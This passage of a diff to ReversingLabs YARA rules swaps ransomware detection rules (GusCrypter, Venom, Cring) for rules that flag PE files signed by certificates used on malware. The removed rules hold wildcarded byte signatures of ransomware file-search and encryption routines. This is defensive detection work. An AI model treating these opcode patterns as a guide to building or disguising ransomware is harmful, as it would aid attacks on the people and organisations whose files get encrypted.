-            ?? ?? ?? FF 75 ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? FF 75 ?? 50 56 6A ?? 6A ??
-            6A ?? FF 75 ?? FF D3 8B F8 F7 DF 1B FF 23 FE 8B 35 ?? ?? ?? ?? 8B D7 8D 4A ?? 66 90
-            8A 02 42 84 C0 75 ?? 2B D1 8B CF E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84
-            C9 75 ?? 2B C2 57 A3 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 81 3D ?? ?? ?? ?? ?? ??
-            ?? ?? 0F 82 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_3 = {
-            55 8B EC 83 EC ?? 57 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B C1 68 ?? ?? ?? ?? 50
-            89 45 ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? 0B C0 5F 8B E5 5D C3 53 6A ?? 57 FF
-            15 ?? ?? ?? ?? 8B D8 83 FB ?? 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 8B D8 56 B8 ?? ??
-            ?? ?? 6A ?? 3B D8 0F 47 D8 53 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 8B F0 83 FE ??
-            75 ?? 5E 5B 0B C0 5F 8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 8B
-            35 ?? ?? ?? ?? 89 45 ?? FF D6 57 FF D6 E8 ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 05
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B F8 BE ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11
-            05 ?? ?? ?? ?? 85 DB 74
-        }
-		$encrypt_files_4 = {
-            8A 0C 06 8D 40 ?? 30 48 ?? 83 EA ?? 75 ?? 8B CF E8 ?? ?? ?? ?? 8B F7 83 C7 ?? 83 EB
-            ?? 75 ?? 8B 45 ?? 0F 10 06 50 0F 11 05 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B F2
-        }
-		$encrypt_files_5 = {
-            66 8B 02 83 C2 ?? 66 85 C0 75 ?? BB ?? ?? ?? ?? 2B D6 8D 7B ?? 66 8B 47 ?? 83 C7 ??
-            66 85 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? 83 C3 ?? F3 A4 66 8B 43 ?? 83 C3
-            ?? 66 85 C0 75 ?? 8B FB B9 ?? ?? ?? ?? 8B 5D ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 A5
-            53 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 35 ?? ?? ?? ?? 6A
-            ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
-            53 FF 15 ?? ?? ?? ?? 5E 5B 33 C0 5F 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $search_files_* ) ) and ( all of ( $encrypt_files_* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "60:49:70:70:ff:4a:83:bc:87:bd:ea:24:da:5b:43:1d" and 1477008000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Guscrypter : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0A333E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GusCrypter ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "64aa468c-ec24-58aa-8ea9-23f0cebed227"
-		date = "2020-11-26"
-		modified = "2020-11-26"
+		id = "5eaac242-ca22-5c73-9027-308d351080bf"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.GusCrypter.yara#L1-L129"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15188-L15204"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cfe6005028c0e5f5d713af2a549574203678bab2ee48acc1727702bcf91522b1"
+		logic_hash = "f76d21e0ae2cf9b28825c813fc509d533c10aba38f8f0c2884365047c1272c1f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GusCrypter"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 45 ?? 8B 5D ?? 83 FB ?? 8B 75 ?? 8B 4D ?? 0F 43 C6 83 F9 ?? 75 ?? 80 38 ?? 0F
-            84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? BA ?? ?? ?? ?? 66 39 10 0F
-            84 ?? ?? ?? ?? 83 FB ?? 8D 55 ?? 0F 43 D6 83 F9 ?? 75 ?? 66 81 3A ?? ?? 75 ?? 80 7A
-            ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 83 FB ?? 8D 55 ?? 0F 43 D6 83 F9 ?? 75 ?? 81 3A ?? ?? ?? ?? 75 ??
-            66 81 7A ?? ?? ?? 75 ?? 80 7A ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 FB ?? 0F
-            43 CE 83 F8 ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83
-            EF ?? 73 ?? 8A 01 3A 02 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 4D ?? 0F 43 CE 83 F8
-            ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EF ?? 73 ??
-            66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 4D
-            ?? 0F 43 CE 83 F8 ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2
-            ?? 83 EF ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? 8B 4D
-            ?? 8D 45 ?? 83 FB ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ??
-            ?? ?? 75 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75
-        }
-		$find_files_p2 = {
-            81 38 ?? ?? ?? ?? 75 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83
-            F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ??
-            81 78 ?? ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 4D ??
-            0F 43 CE 83 7D ?? ?? 75 ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 01 3B 02 75 ?? 83 C1 ??
-            83 C2 ?? 83 EF ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ??
-            83 FB ?? 8D 45 ?? 0F 43 C6 83 7D ?? ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ??
-            ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 4D ?? 0F 43 CE 83 7D
-            ?? ?? 75 ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EF
-            ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? B0 ?? EB ?? 32 C0 84 C0 75
-            ?? 8D 85 ?? ?? ?? ?? 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ??
-            ?? 8B CC 8B D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83
-            C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ??
-            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B BD ?? ?? ?? ?? C6 45 ?? ?? 83 FB ?? 72 ?? 43 8B C6 81 FB ?? ?? ?? ??
-            72 ?? 8B 76 ?? 83 C3 ?? 2B C6 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 53 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF
-            15
-        }
-		$encrypt_files_p1 = {
-            88 84 05 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 7C ?? 33 FF 33 F6 8B C6 8A 9C 35 ?? ?? ?? ??
-            99 F7 7D ?? 0F B6 04 0A 03 F8 0F B6 CB 03 F9 81 E7 ?? ?? ?? ?? 79 ?? 4F 81 CF ?? ??
-            ?? ?? 47 8A 84 3D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 88 84 35 ?? ?? ?? ?? 46 88 9C 3D ??
-            ?? ?? ?? 81 FE ?? ?? ?? ?? 7C ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50
-            E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 0F 85 ?? ?? ?? ?? 8B 4D ?? 32 D2 E8 ?? ?? ?? ??
-            8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
-            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D
-            ?? 42 8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
-            F8 ?? 0F 87 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45
-            ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 89 BD ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 33 F6
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 88 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75
-        }
-		$encrypt_files_p2 = {
-            0F BE 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 46 83 C4 ?? 83 FE ?? 7C ?? 53 E8 ?? ?? ??
-            ?? 83 C4 ?? 88 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83
-            7D ?? ?? 8D 4D ?? 8A 85 ?? ?? ?? ?? 0F 43 4D ?? C7 45 ?? ?? ?? ?? ?? 88 01 C6 41 ??
-            ?? 33 C9 8B 75 ?? 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            4D ?? 83 7D ?? ?? 8B F8 0F 43 4D ?? 56 57 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F BE
-            07 FF B5 ?? ?? ?? ?? 35 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B
-            BD ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ??
-            83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 32 D2 C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 8D 50 ?? 8B C1
-            81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ??
-            ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ??
-            ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$misc_checks_p1 = {
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83
-            F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ??
-            ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F
-            84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-        }
-		$misc_checks_p2 = {
-            85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ??
-            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $misc_checks_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Coulomb Limited" and pe.signatures [ i ] . serial == "0a:33:3e" and 1052750648 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Venom : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1Cb6519B2528D006D1Da987153Dad2B3 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Venom ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "72149ec2-888e-5bed-baf1-0ec44e48328e"
-		date = "2022-06-06"
-		modified = "2022-06-06"
+		id = "774e28f7-46ba-533d-a73c-00d2536c7d2b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Venom.yara#L1-L68"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15206-L15222"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5817ece6a1cc304835f7fc243c4cfdc3c7cacd2251a9ac294a6662b58d2552e8"
+		logic_hash = "776402fc3a7de4843373bc1981f965fe9c2a9f1fe2374b142a96952fd05a591b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Venom"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$setup_env = {
-            00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1B
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 07 6F ?? ??
-            ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 06 11 ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28
-            ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 1F
-            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ??
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 20 ?? ?? ?? ?? 19 7E ?? ?? ?? ?? 19 16 7E ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 0D 09 08 20 ?? ?? ?? ?? 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 28
-            ?? ?? ?? ?? 00 2A
-        }
-		$find_files = {
-            00 00 00 03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 00 00 08 72 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 16 FE 01 0D 09 2C ?? 00 08 02 28 ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 00 07
-            17 58 0B 07 06 8E 69 32 ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13
-            ?? 00 11 ?? 02 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ??
-            26 00 00 DE ?? 2A
-        }
-		$encrypt_files = {
-            00 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 18 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 07 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ??
-            13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F
-            ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 17 6F ?? ?? ?? ?? 00 08 06 16 06
-            8E 69 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ??
-            ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ??
-            ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D
-            ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00
-            DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 00 00
-            DE ?? 26 00 00 DE ?? 00 DC 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "D and D Internet Services" and pe.signatures [ i ] . serial == "1c:b6:51:9b:25:28:d0:06:d1:da:98:71:53:da:d2:b3" and 1012780800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Cring : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_621E696C3A6371E77A678Cbf0Ee34Ab2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Cring ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "76530a6d-145b-5316-8200-4b191d0754fd"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "606749dc-f4ef-526a-8583-486401866759"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Cring.yara#L1-L66"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15224-L15240"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "05cf60ad39c9dcc592345f13b63c99b153b9253297a8ad9e52e0439081d8c796"
+		logic_hash = "67c9fd92681d6dd1172509113e167e74e07f1f86fd62456758b3e3930180b528"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Cring"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 19 2E ?? 08 6F ?? ?? ?? ??
-            18 33 ?? 08 6F ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 02 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            0D 2B ?? 09 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09 6F
-            ?? ?? ?? ?? DC 07 17 58 0B 07 06 8E 69 32 ?? 2A
-        }
-		$find_files_p2 = {
-            02 7B ?? ?? ?? ?? 0B 07 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 16 0A DD ??
-            ?? ?? ?? 02 15 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ??
-            ?? ?? 14 0C 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 2C
-            ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 2B ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ??
-            9A 0D 02 09 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 17 0A DD ?? ?? ?? ?? 02 15 7D ?? ?? ??
-            ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 8E 69
-            32 ?? 02 14 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 14 0C 02 7B ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 0C DE ?? 26 DE ?? 08 39 ?? ?? ?? ?? 02 08 7D ?? ?? ?? ?? 02 16 7D ?? ?? ??
-            ?? 38 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 9A 13 ?? 02 11 ?? 02 7B ?? ?? ??
-            ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 1F ?? 7D ?? ?? ??
-            ?? 2B ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 7D ?? ?? ?? ?? 02 18 7D ?? ??
-            ?? ?? 17 0A DE ?? 02 1F ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 28
